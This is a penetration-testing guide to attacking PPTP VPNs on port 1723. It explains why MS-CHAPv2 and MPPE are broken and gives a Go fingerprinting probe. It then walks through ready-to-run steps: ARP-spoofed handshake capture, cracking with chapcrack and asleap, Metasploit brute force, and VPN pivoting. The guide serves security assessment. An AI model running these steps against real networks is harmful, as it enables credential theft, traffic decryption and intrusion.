PPTP - Port 1723

Basic info

The Point-to-Point Tunneling Protocol (PPTP) is a network protocol used to implement virtual private networks (VPNs). It is still found in the wild because it is easy to configure and fast, but its authentication (MS-CHAPv2) and encryption (MPPE) are cryptographically broken: a single captured handshake is enough to recover the user's NT hash and, with it, to decrypt the session. Knowing how to identify, test, and exploit PPTP is therefore essential for penetration testers.

This guide covers in-depth technical methods to identify, analyze, and exploit PPTP, allowing security professionals to perform accurate vulnerability assessments and simulate real-world attack vectors.

Understanding the PPTP Protocol Structure

PPTP uses the following components:

  • TCP Port 1723: For control messages

  • GRE (Generic Routing Encapsulation): Protocol number 47, used to encapsulate PPP frames

GRE is stateless and unauthenticated; the only protection for the PPP payload it carries is MPPE, whose RC4 keys are derived from the same MS-CHAPv2 secrets an attacker can recover from the handshake. An on-path attacker who can see GRE can therefore record the session and decrypt it later once the NT hash is known. Separately, devices that cannot pass or track GRE correctly (many NAT boxes and firewalls) are the usual reason a PPTP tunnel dies right after a successful authentication.

Authentication Mechanisms and Weaknesses

PPTP authenticates with MS-CHAPv1 or MS-CHAPv2 and encrypts with Microsoft Point-to-Point Encryption (MPPE), an RC4 stream cipher whose session keys are derived from the user's NT hash. Both authentication methods have critical weaknesses, and because MPPE's keys come from the same secret, breaking the authentication also breaks the confidentiality of the tunnel.

MS-CHAPv2 Authentication Vulnerabilities

  • The 24-byte NT-Response is three independent DES encryptions of one 8-byte challenge hash under keys cut from the 16-byte NT hash (padded with five zero bytes to 21). The third key contains only two unknown bytes, so it falls in at most 65,536 trials; the other two are recovered with a single 2^56 DES keysearch (Marlinspike and Hulton, 2012). The NT hash of any user whose handshake is captured is therefore recoverable regardless of password strength.

  • The NT hash is an unsalted MD4 of the UTF-16LE password, so a captured challenge/response also allows fast offline dictionary and brute-force attacks on the password itself.

  • The NT hash alone is sufficient: it authenticates as the user and derives the MPPE keys, so captured GRE traffic can be decrypted without ever learning the password.


Identifying PPTP Services During Network Reconnaissance

Nmap Scanning for PPTP Detection

To identify active PPTP services, use the Nmap port scanner targeting TCP port 1723:

nmap -sS -p 1723 --script pptp-version <target-ip>

Look for:

  • Open port 1723 (PPTP control channel); the pptp-version script reports the hostname, vendor string and firmware revision from the server's Start-Control-Connection-Reply, which often identifies the appliance or the pppd/PoPToP build

  • OS fingerprinting (-O) to detect routers or VPN appliances

Netcat can confirm that the port accepts connections, but it will not show a banner:

nc <target-ip> 1723

PPTP is a binary protocol and the server stays silent until it receives a valid Start-Control-Connection-Request (SCCRQ): a 156-byte message beginning with the length, message type 1, the magic cookie 0x1A2B3C4D and control message type 1. The Start-Control-Connection-Reply (SCCRP) that comes back carries a result code, the server's hostname and a 64-byte vendor string, which is what the pptp-version script uses to fingerprint the device. GRE is not negotiated on this channel; it only carries the PPP data once a call has been set up.
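The exchange described above, written out as an added example for this page (it is not the Nmap script's code and not from the original page): the tool builds the 156-byte SCCRQ from RFC 2637, sends it to TCP/1723 and parses the SCCRP for the result code, hostname and vendor string. The function names, the constructed sample reply used when no host is given, and the hostname and vendor string inside it are all made up for the example; a result code of 1 means the server accepted the control connection.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"net"
	"os"
	"time"
)

// Control-message constants from RFC 2637; SCCRQ and SCCRP are both 156 bytes.
const (
	magicCookie = 0x1A2B3C4D
	msgControl  = 1
	ctrlSCCRQ   = 1 // Start-Control-Connection-Request
	ctrlSCCRP   = 2 // Start-Control-Connection-Reply
	sccrLen     = 156
)

// sccr is the big-endian wire layout shared by SCCRQ and SCCRP. At offset 14 the request
// carries a reserved uint16 while the reply carries Result Code and Error Code (ResultErr).
type sccr struct {
	Length, MsgType       uint16
	Cookie                uint32
	CtrlType, Res0        uint16
	Version, ResultErr    uint16
	Framing, Bearer       uint32
	MaxChannels, Firmware uint16
	Host, Vend            [64]byte
}

// Accessors for the reply fields a recon probe records (NUL-padded 64-byte strings).
func (s *sccr) Hostname() string   { return string(bytes.TrimRight(s.Host[:], "\x00")) }
func (s *sccr) Vendor() string     { return string(bytes.TrimRight(s.Vend[:], "\x00")) }
func (s *sccr) ResultCode() byte   { return byte(s.ResultErr >> 8) }

// buildSCCRQ encodes a Start-Control-Connection-Request; hostname and vendor are
// whatever the client chooses to present and servers do not validate them.
func buildSCCRQ(hostname, vendor string) []byte {
	req := sccr{Length: sccrLen, MsgType: msgControl, Cookie: magicCookie, CtrlType: ctrlSCCRQ,
		Version: 0x0100, Framing: 1, Bearer: 1, MaxChannels: 1, Firmware: 1}
	copy(req.Host[:], hostname)
	copy(req.Vend[:], vendor)
	buf := new(bytes.Buffer)
	binary.Write(buf, binary.BigEndian, &req)
	return buf.Bytes()
}

// parseSCCRP decodes a reply, rejecting anything that is not a full-length PPTP SCCRP.
func parseSCCRP(data []byte) (*sccr, error) {
	var r sccr
	if len(data) < sccrLen || binary.Read(bytes.NewReader(data), binary.BigEndian, &r) != nil ||
		r.Cookie != magicCookie || r.MsgType != msgControl || r.CtrlType != ctrlSCCRP {
		return nil, errors.New("not a PPTP Start-Control-Connection-Reply")
	}
	return &r, nil
}

// sampleSCCRP is a constructed reply (not captured from any real server) for offline use.
func sampleSCCRP() []byte {
	rep := sccr{Length: sccrLen, MsgType: msgControl, Cookie: magicCookie, CtrlType: ctrlSCCRP,
		Version: 0x0100, ResultErr: 1 << 8, Framing: 3, Bearer: 3, MaxChannels: 100, Firmware: 0x0100}
	copy(rep.Host[:], "vpn-gw01")
	copy(rep.Vend[:], "ExampleVendor PPTP")
	buf := new(bytes.Buffer)
	binary.Write(buf, binary.BigEndian, &rep)
	return buf.Bytes()
}

// probe connects to host:1723, sends an SCCRQ and parses the reply. A bare connect gets
// nothing back: the server only speaks after it has received a valid SCCRQ.
func probe(host string, timeout time.Duration) (*sccr, error) {
	conn, err := net.DialTimeout("tcp", net.JoinHostPort(host, "1723"), timeout)
	if err != nil {
		return nil, err
	}
	defer conn.Close()
	conn.SetDeadline(time.Now().Add(timeout))
	if _, err := conn.Write(buildSCCRQ("recon", "pptp-probe")); err != nil {
		return nil, err
	}
	reply := make([]byte, sccrLen)
	if _, err := io.ReadFull(conn, reply); err != nil {
		return nil, err
	}
	return parseSCCRP(reply)
}

func main() {
	r, err := parseSCCRP(sampleSCCRP()) // offline demo; pass a host on the command line to probe it
	if len(os.Args) > 1 {
		r, err = probe(os.Args[1], 3*time.Second)
	}
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("result=%d hostname=%q vendor=%q firmware=0x%04x\n", r.ResultCode(), r.Hostname(), r.Vendor(), r.Firmware)
}
```

Run it with a target IP as the first argument to probe a live server; with no argument it parses the constructed reply. Even a non-1 result code is useful: the hostname and vendor fields are filled in either way.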


Capturing and Cracking MS-CHAPv2 Handshakes

Tools for PPTP Handshake Capture

The MS-CHAPv2 exchange travels inside PPP frames that are encapsulated in GRE, so the capture filter must include IP protocol 47; TCP/1723 only carries call setup. You need to be on the path between client and server (for example via ARP spoofing on the client's LAN) or to control one endpoint, such as a rogue PPTP server the victim is lured into connecting to. Capture with Wireshark or tcpdump:

tcpdump -i eth0 'port 1723 or ip proto 47' -w pptp_handshake.pcap

Cracking with chapcrack and asleap

  1. Parse the capture. chapcrack prints the username, the 8-byte challenge hash and the 24-byte response, recovers the third DES key (NT-hash bytes 14 and 15) on the spot, and emits a token for the remaining 2^56 DES keysearch:

    chapcrack parse -i pptp_handshake.pcap
  2. For a dictionary attack on the password, pass the challenge hash and the response to asleap as colon-delimited hex bytes:

    asleap -C <challenge> -R <response> -W /path/to/wordlist

The dictionary attack only succeeds against weak passwords; the DES keysearch recovers the NT hash for any password, and the hash is all that is needed to authenticate or, with chapcrack's decrypt subcommand, to decrypt the captured MPPE traffic.


Exploiting PPTP Using Metasploit

Metasploit includes auxiliary modules for PPTP brute-force:

use auxiliary/scanner/vpn/pptp_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Feed passwords recovered from cracked handshakes into PASS_FILE to validate them against the live server. MS-CHAPv2 never needs the cleartext password: a client patched to take the NT hash directly (the value a DES keysearch of the handshake yields even for strong passwords) authenticates just as well, so an uncracked hash is not a dead end.


VPN Pivoting After PPTP Access

After compromising credentials (or the NT hash), an attacker can establish a VPN session and pivot into internal networks.

Use pptpsetup or pppd to establish the session:

pptpsetup --create pptpvpn --server <target-ip> --username user --password pass --encrypt
pon pptpvpn

Verify that a ppp interface came up (pppd logs the negotiated addresses) and add routes for the internal ranges through it. If authentication succeeds but the tunnel then stalls, GRE (IP protocol 47) is usually being dropped or mangled by a firewall or NAT device between you and the server; it must pass in both directions.

